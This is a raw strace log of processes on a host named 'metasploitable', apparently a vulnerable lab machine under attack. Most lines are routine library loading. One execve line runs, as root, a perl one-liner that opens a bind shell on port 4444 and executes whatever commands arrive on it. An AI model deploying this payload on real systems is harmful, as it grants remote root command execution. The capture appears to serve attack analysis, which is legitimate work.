5213  07:08:09.859760 open("/etc/ld.so.cache", O_RDONLY) = 1

5213  07:08:09.859772 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5213  07:08:09.859788 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f91000

5213  07:08:09.859797 close(1)          = 0

5213  07:08:09.859807 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5213  07:08:09.859822 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

5213  07:08:09.859835 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

5213  07:08:09.859986 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

5213  07:08:09.860005 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7de1000

5213  07:08:09.860030 mmap2(0xb7de9000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7de9000

5213  07:08:09.860060 close(1)          = 0

5213  07:08:09.860072 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5213  07:08:09.860085 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

5213  07:08:09.860099 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

5213  07:08:09.860189 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

5213  07:08:09.860206 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dd6000

5213  07:08:09.860217 mmap2(0xb7ddf000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7ddf000

5213  07:08:09.860233 close(1)          = 0

5213  07:08:09.860253 munmap(0xb7f91000, 29913) = 0

5213  07:08:09.860268 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

5213  07:08:09.860282 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

5213  07:08:09.860293 _llseek(1, 0, [0], SEEK_CUR) = 0

5213  07:08:09.860305 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

5213  07:08:09.860321 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f98000

5213  07:08:09.860331 _llseek(1, 1624, [1624], SEEK_SET) = 0

5213  07:08:09.860346 munmap(0xb7f98000, 1624) = 0

5213  07:08:09.860355 close(1)          = 0

5213  07:08:09.860383 getpgrp()         = 3831

5213  07:08:09.860392 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

5213  07:08:09.860437 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

5213  07:08:09.860475 brk(0x8101000)    = 0x8101000

5213  07:08:09.860536 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5213  07:08:09.860550 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5213  07:08:09.860564 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5213  07:08:09.860600 brk(0x8102000)    = 0x8102000

5213  07:08:09.860626 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5213  07:08:09.860643 stat64("/sbin/AB", 0xbfe6ccc8) = -1 ENOENT (No such file or directory)

5213  07:08:09.860655 stat64("/bin/AB", 0xbfe6ccc8) = -1 ENOENT (No such file or directory)

5213  07:08:09.860666 stat64("/usr/sbin/AB", 0xbfe6ccc8) = -1 ENOENT (No such file or directory)

5213  07:08:09.860678 stat64("/usr/bin/AB", 0xbfe6ccc8) = -1 ENOENT (No such file or directory)

5213  07:08:09.860690 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

5213  07:08:09.860704 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e0c6f8) = 5214

5214  07:08:09.860748 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5214  07:08:09.860764 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

5214  07:08:09.860777 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

5214  07:08:09.860789 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

5214  07:08:09.860803 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5214  07:08:09.860819 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

5214  07:08:09.860831 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

5214  07:08:09.860884 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

5214  07:08:09.860898 --- SIGPIPE (Broken pipe) @ 0 (0) ---

5214  07:08:09.861028 exit_group(127)   = ?

5213  07:08:09.875456 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5213  07:08:09.875457 --- SIGCHLD (Child exited) @ 0 (0) ---

5213  07:08:09.875457 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 5214

5213  07:08:09.875457 waitpid(-1, 0xbfe6c948, WNOHANG) = -1 ECHILD (No child processes)

5213  07:08:09.875457 sigreturn()       = ? (mask now [])

5213  07:08:09.875457 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

5213  07:08:09.875468 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5213  07:08:09.875479 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

5213  07:08:09.875491 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

5213  07:08:09.875509 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5213  07:08:09.875520 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

5213  07:08:09.875557 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5213  07:08:09.875577 stat64("/sbin/perl", 0xbfe6ccf8) = -1 ENOENT (No such file or directory)

5213  07:08:09.875589 stat64("/bin/perl", 0xbfe6ccf8) = -1 ENOENT (No such file or directory)

5213  07:08:09.875600 stat64("/usr/sbin/perl", 0xbfe6ccf8) = -1 ENOENT (No such file or directory)

5213  07:08:09.875612 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

5213  07:08:09.875630 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

5213  07:08:09.875654 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

5213  07:08:09.875668 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e0c6f8) = 5215

4519  07:08:09.875704 waitpid(5213,  <unfinished ...>

5215  07:08:09.875759 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5215  07:08:09.875777 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

5215  07:08:09.875790 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

5215  07:08:09.875817 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

5215  07:08:09.875831 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5215  07:08:09.875846 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

5215  07:08:09.875858 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

5215  07:08:09.875891 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

5215  07:08:09.875976 brk(0)            = 0x8153000

5215  07:08:09.875996 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5215  07:08:09.876010 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fcb000

5215  07:08:09.876025 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

5215  07:08:09.876041 open("/etc/ld.so.cache", O_RDONLY) = 1

5215  07:08:09.876053 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5215  07:08:09.876070 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fc3000

5215  07:08:09.876080 close(1)          = 0

5215  07:08:09.876090 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5215  07:08:09.876104 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

5215  07:08:09.876118 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

5215  07:08:09.876208 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

5215  07:08:09.876257 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7fbf000

5215  07:08:09.876270 mmap2(0xb7fc1000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7fc1000

5215  07:08:09.876300 close(1)          = 0

5215  07:08:09.876311 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5215  07:08:09.876328 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

5215  07:08:09.876342 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

5215  07:08:09.876428 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

5215  07:08:09.876445 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f9a000

5215  07:08:09.876456 mmap2(0xb7fbd000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7fbd000

5215  07:08:09.876471 close(1)          = 0

5215  07:08:09.876483 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5215  07:08:09.876496 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

5215  07:08:09.876510 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

5215  07:08:09.876594 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

5215  07:08:09.876610 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f99000

5215  07:08:09.876623 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f81000

5215  07:08:09.876633 mmap2(0xb7f95000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f95000

5215  07:08:09.876647 mmap2(0xb7f97000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f97000

5215  07:08:09.876660 close(1)          = 0

5215  07:08:09.876671 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5215  07:08:09.876684 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

5215  07:08:09.876697 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

5215  07:08:09.876832 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

5215  07:08:09.876850 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e32000

5215  07:08:09.876861 mmap2(0xb7f7b000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f7b000

5215  07:08:09.876875 mmap2(0xb7f7e000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f7e000

5215  07:08:09.876888 close(1)          = 0

5215  07:08:09.876900 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5215  07:08:09.876913 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

5215  07:08:09.876926 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

5215  07:08:09.877013 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

5215  07:08:09.877030 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e00000

5215  07:08:09.877040 mmap2(0xb7e09000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7e09000

5215  07:08:09.877054 mmap2(0xb7e0b000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7e0b000

5215  07:08:09.877067 close(1)          = 0

5215  07:08:09.877090 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7dff000

5215  07:08:09.877102 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7dff8c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

5215  07:08:09.877158 mprotect(0xb7f7b000, 4096, PROT_READ) = 0

5215  07:08:09.877184 munmap(0xb7fc3000, 29913) = 0

5215  07:08:09.877197 set_tid_address(0xb7dff908) = 5215

5215  07:08:09.877205 set_robust_list(0xb7dff910, 0xc) = 0

5215  07:08:09.877215 futex(0xbfccc160, 0x81 /* FUTEX_??? */, 1) = 0

5215  07:08:09.877963 rt_sigaction(SIGRTMIN, {0xb7f852c0, [], SA_SIGINFO}, NULL, 8) = 0

5215  07:08:09.877990 rt_sigaction(SIGRT_1, {0xb7f85340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

5215  07:08:09.878002 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

5215  07:08:09.878016 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

5215  07:08:09.878034 uname({sys="Linux", node="metasploitable", ...}) = 0

5215  07:08:09.878083 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

5215  07:08:09.878128 brk(0)            = 0x8153000

5215  07:08:09.878138 brk(0x8174000)    = 0x8174000

5215  07:08:09.878180 getuid32()        = 0

5215  07:08:09.878190 geteuid32()       = 0

5215  07:08:09.878199 getgid32()        = 0

5215  07:08:09.878207 getegid32()       = 0

5215  07:08:09.878243 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7dde000

5215  07:08:09.878269 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

5215  07:08:09.878285 read(1, "\260j\1\342", 4) = 4

5215  07:08:09.878302 close(1)          = 0

5215  07:08:09.878319 time(NULL)        = 1495624089

5215  07:08:09.878359 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbfccbe30) = -1 ENOENT (No such file or directory)

5215  07:08:09.878377 stat64("/usr/local/lib/site_perl/5.8.8", 0xbfccbe30) = -1 ENOENT (No such file or directory)

5215  07:08:09.878389 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbfccbe30) = -1 ENOENT (No such file or directory)

5215  07:08:09.878455 stat64("/usr/local/lib/perl/5.8.7", 0xbfccbf70) = -1 ENOENT (No such file or directory)

5215  07:08:09.878484 stat64("/usr/local/share/perl/5.8.7", 0xbfccbf70) = -1 ENOENT (No such file or directory)

5215  07:08:09.878496 stat64("/usr/local/lib/perl/5.8.6", 0xbfccbf70) = -1 ENOENT (No such file or directory)

5215  07:08:09.878522 stat64("/usr/local/share/perl/5.8.6", 0xbfccbf70) = -1 ENOENT (No such file or directory)

